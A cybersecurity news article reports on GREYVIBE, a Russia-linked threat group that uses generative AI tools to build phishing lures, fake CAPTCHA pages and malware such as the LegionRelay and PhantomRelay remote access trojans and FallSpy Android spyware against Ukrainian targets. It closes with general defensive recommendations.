Threat actors are increasingly turning to generative AI tools such as ChatGPT and Google Gemini to accelerate cyberattack operations, lowering technical barriers and reshaping modern threat landscapes.
A recent report by WithSecure highlights a Russia-linked threat group, tracked as GREYVIBE, that has systematically integrated large language models (LLMs) into its campaigns targeting Ukraine and related entities since August 2025.
Cyberattack Operations
GREYVIBE has conducted a wide range of multi-vector attacks, combining spear-phishing, fake CAPTCHA verification pages, and malicious websites to distribute malware.
The group’s phishing campaigns, known as PhantomMail, relied on malicious archive files hosted on services like Google Drive, tricking victims into executing loaders disguised as legitimate documents.
Another campaign, PhantomClick, used fake CAPTCHA pages that impersonated platforms such as Zoom to socially engineer users into executing malicious commands.
Meanwhile, the PrincessClub operation deployed fake adult-themed websites to lure victims, including Ukrainian military personnel, into downloading spyware and remote access tools.
The report reveals that GREYVIBE extensively uses AI tools, including ChatGPT, Google Gemini, and Ideogram AI, across the entire attack lifecycle. These technologies are leveraged to generate phishing lures, design malicious websites, develop obfuscated scripts, and even assist in malware creation.
This operational use of AI enables the group to rapidly build and modify attack infrastructure, reducing reliance on traditional, reusable malware patterns that defenders can more easily detect.
One notable example is LegionRelay, a custom PowerShell-based remote access trojan (RAT) believed to be partially developed with AI assistance.
Despite its relatively simple design, the malware enables attackers to execute commands, exfiltrate files, capture screenshots, and harvest sensitive data from applications like Telegram and WhatsApp. However, researchers identified design flaws in LegionRelay that exposed parts of its backend infrastructure, allowing deeper visibility into GREYVIBE’s operations.
In addition to LegionRelay, the group deploys PhantomRelay, another RAT that uses WebSocket communication and modular scripting to extend its capabilities post-compromise.
On mobile platforms, GREYVIBE uses FallSpy, an Android spyware that can collect contacts, call logs, location data, and device information. These tools are supported by custom obfuscators such as DAYLIGHT and TEASOUP, which help evade detection and analysis.
AI plays a critical role in enabling GREYVIBE to scale operations efficiently. By automating coding tasks, generating convincing social engineering content, and assisting in infrastructure setup, AI reduces the skill threshold required for complex cyber operations.
This also complicates attribution, as AI-generated code and artifacts can vary significantly between campaigns, weakening traditional detection methods based on code reuse and behavioral patterns.
Despite aligning with Russian state interests, particularly intelligence gathering in the context of the Ukraine conflict, GREYVIBE exhibits characteristics of both state-sponsored and cybercriminal activity.
Evidence suggests the group operates in the Moscow time zone, uses Russian-language infrastructure, and may have ties to known cybercrime ecosystems such as TrickBot-linked clusters. This hybrid nature blurs the line between nation-state operations and organized cybercrime.
The emergence of AI-assisted threat groups like GREYVIBE signals a shift in cyber warfare, where automation and generative technologies enhance both speed and adaptability.
For defenders, this evolution presents new challenges, as attackers can rapidly iterate tactics and evade detection mechanisms. Organizations are advised to strengthen email filtering, monitor unusual command execution, and adopt behavior-based detection systems to counter increasingly AI-driven threats.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
